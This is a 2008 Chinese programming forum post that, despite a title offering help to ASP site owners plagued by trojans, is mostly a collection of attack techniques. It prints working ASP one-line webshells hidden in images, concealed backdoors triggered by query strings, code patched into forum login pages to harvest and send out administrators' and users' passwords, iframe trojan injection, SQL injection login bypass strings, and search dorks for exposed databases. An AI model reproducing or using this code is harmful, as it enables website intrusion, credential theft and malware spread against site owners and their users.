| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 3608 人关注过本帖
标题:如果你的asp站经常被挂马. 有需要看看这个
取消只看楼主 加入收藏
frankqnj
Rank: 4
等 级:贵宾
威 望:12
帖 子:320
专家分:278
注 册:2008-4-6
结帖率:100%
收藏
 问题点数:0 回复次数:0 
如果你的asp站经常被挂马. 有需要看看这个
1.名称:如何制作图片ASP木马 (可显示图片)

建一个asp文档,内容为



<!--#i nclude file="ating.jpg"-->
 



找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成功,还要搜索%和%,将其变为00,(不要替换自己asp的),再把jpg文档开头加入



<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#)+) </SCRIPT>
 


2. 名称:整蛊网吧

先用精锐网吧辅助工具得到用户名和密码,然后用电脑管理联结一台机器,开telnet,连接,开共享,复制一个木马过去运行即可。


3.名称:感受MD5暴力破解的魅力

rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"

1和7代表密码最小和最大长度

阿汀我再加个方法:http://md5. 在线破解

或到http://www.


4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程式就能逃杀,更有很多加壳软件,大家木马加壳的时候最好多选择不知名的加壳软件。


5.名称:隐蔽的插入型ASP木马


(1)在我们要做手脚的asp文档里加入如下内容


<%if request("action")="ok" then%>
 

shell代码插在这里,最好是小马,还要加密一下



<%end if%>
 

访问的时候在您作手脚的asp文档后面加上?action=ok,即可


(2)另一种方法,在我们要做手脚的asp文档里加入如下内容



<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),2
%>
 

访问的时候在做手脚的asp文档后面加上?filer=XXX

XXX为您本地上传的一个路径如 c:ating123.asp

上传后在做手脚的asp的同文档夹中有ating,asp


(3)前提得到system权限,进入网站目录下一层

mkdir s…

copy ating.asp s…/

这样杀毒软件很难找到的

访问http://网站/s…/ating.asp即可。


6. 工具http://hack520.,此工具在该电脑生成一个终极用户

用户名为:hack 密码110,在DOS下和电脑管理器上看不到您建立的用户,并且是删除不掉的。

7.名称:QQ群脚本攻击

打开qq对话诓,复制消息,然后,下面的内容保存为.vbs 文档,运行即可。



Set WshShell= WScript.createobject("WScript.Shell")
WshShell.AppActivate "QQ信息攻击脚本"
for i=1 to 20
WScript.Sleep 1000
WshShell.SendKeys"^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next
 


8.搜索:程式制作:万鹏 有免费申请空间的,直接上传asp马即可。


9. 名称:全面找出您站上的ASP木马

(1) 用杀毒软件

(2) 用FTP客户端软件,点"工具"->"比较文档夹"

(3) 用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马

(4) 用工具Beyond Compare


10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画


(1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,能够这样,

老办法:

修改admin_login.asp得到明文DVBBS后台密码

在"username=trim(replace(request("username")这行后面



Dim fsoObject
Dim tsObject
Set fsoObject = Server.createObject("Scripting.FileSystemObject")
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
 


只要管理员登陆后台,在目录下就生成了laner.txt。


(2)login.asp中Case "login_chk"下:



on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
 


这样laner.asp将获得全部登陆人的登陆时间,用户名和密码。


(3)假如您有自己的网站或另外的webshell(强烈建议使用): 能够建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:



<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
end if%>
 


11. 名称:利用QQ在线状态抓鸽子肉鸡

生成qq在线状态,把里面的地址改成木马地址,发到论坛在login.asp那里插入一句:



response.write"<scriptsrc=http://www.

n="&request("username")&""&"&p="&request("password")

&"></script>"response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request

("username")&""&"&p="&request("password")&"></iframe>"
 


结果任何登陆人都会乖乖的把名字和密码送到您的laner.asp 里


12. 动画名称:媒体中国整站程式存在多处漏洞

漏洞程式:媒体中国整站程式(第一版)

官方网站:http://meiti.

漏洞: %5c(暴库) 上传 注入

上传页面:down1/upload.asp


13. 名称:免费电话+MSH命令行工具

http://www. 打开主页,点击坐下角,Free DownLoad,下载到本地,安装,运行后,会提示正在寻找您所在地区的区号。由于是国际长途,注册一个帐号,送100美分,国内计时0.01/分,您就有100分钟能够白打。是个帐号哦。

要注意的就是,固定电话,小灵通 形式为0086521123456 521本来时0521,要省略前面的零,手机号也是相同。


14. 名称:Bo-Blog的新漏洞

http://网址/index.php?job=../admin/ban

把其中"禁止搜索的词"那部分 另存出来,里面的地址改完整,插入一句话木马

15. 名称:钩魂者入侵传奇私服

用百度 搜索 传奇 inurl:tuku

或 传奇 inurl:wplm.htm

再或 传奇 inurl:coolsites.asp

友情链接里插入一句话木马即可


16. 程式: 宏达企业整站上传漏洞

官方主页:http://www.

漏洞页面:/cx/upfile.asp (上传漏洞)


17.无间盗邮箱,在修改密码里,用户名和密码里添or=or


18.名称: bbsxp5.16后台得到webshell

bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文档上传,就是在基本配置上添加上上传类型也不行,并禁止了修改数据备份数据名称,我们能够把此网页保存在本地,改源代码上传。


19.名称:JHACKJ 2005年最新精典教程

下载看看吧,不错,各大网站都有


20.名称:省力入侵韩国肉鸡

在啊D的扫描注入点项,打开这个:http://www.google.co.kr/advanced_search?hl=zh-CN

这是高级搜索项,关键字随便写。这里我写asp?name= 配置为每页显示100条。

语种选择韩文。搜索,很多sa.


21.名称:任何网吧的管理系统破解

选智能ABC,然后vv输入,光标后退两步,按delete键 刚输入的两个vv删除, 最后按Inter键。


22.名称:破解QQ空间插入网页木马的代码

现在腾讯已封了很多QQ空间代码了,就如以前


 <iframe src="木马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>
 



插入网页木马的代码也早被封了,突破禁用的方法,代码如下:



<div id=DI><img src="javascript :DI.innerHTML=\<iframe src=木马地址

 width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0

scrolling=no></iframe>\" style=display:none></div>
 


最后附上总结的


1.上传漏洞[不多讲]

pS: 假如看到:选择您要上传的文档 [重新上传]或出现"请登陆后使用",80%就有漏洞了!

有时上传不一定会成功,这是因为Cookies不相同.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.


2.注入漏洞[不多讲]

pS:对MD5密码.有时我们不是哪么容易跑出来.假如是[SQL数据库].那么我们能够用以下命令:

http://注入网址;update admin set password=\新MD5密码\ where password=\旧MD5密码\-- [admin为表名.]


3.旁注,也就是跨站.

我们入侵某站时可能这个站坚固的无懈可击,我们能够找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了


4.暴库:把二级目录中间的/换成%5c

EY:http://www.ahttc.职责范围&BigClassType=1

假如您能看到:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是个有效的路径。 确定路径名称拼写是否正确,连同是否 连接到文档存放的服务器。

这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.


5.\or\=\or\这是个能够连接SQL的语名句.能够直接进入后台。我收集了一下。类似的更有:

\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a


6.社会工程学。这个我们都知道吧。就是猜解。

 EY:http://www.neu.

admin waishi


7.写入ASP格式数据库。就是一句话木马[ ],常用在留言本.

EY:http://www.ahsdxy.ah.[这个就是ASP格式的数据库],再写入一句话木马


8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.

EY:http://www.ahsdxy.ah.

这个站用的是:杰出校友录,源码我下过了,

默认数据库/webshell路径:databaseliangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin


9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.



/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
 


工具:网站猎手 挖掘鸡

EY:http://www.


10.查看目录法:人一些网站能够断开目录,能够方问目录。

EY:http://www.

http://

这样我们能够找到数据库,下载不用我教吧


11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法能够取得大量的WEBSHELL]


12.搜索引擎利用:

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/

(2).找网站的管理后台地址:

site:管理

site:管理 <关键字很多,自已找>

site:

(3).查找access的数据库,mssql、mysql的连接文档

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

我主不做了。。自已做做吧。。


13.COOKIE欺骗:

把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具能够修改COOKIE。这个我就不多讲了


14.利用常见的漏洞:如动网BBS

EY:http://

能够先用:dvbbs权限提升工具,使自已成为前台管理员。

THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要您自已做。我们能够用WSockExpert取得Cookies/NC包

这个我就不做了,网上教程多的是,自已下个看看。

工具:dvbbs权限提升工具 动网固顶贴工具


15.更有一些老漏洞。如IIS3,4的查看源码,5的delete

CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途
搜索更多相关主题的帖子: 木马 asp 网吧 form 
2008-06-22 04:28
快速回复:如果你的asp站经常被挂马. 有需要看看这个
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.040128 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved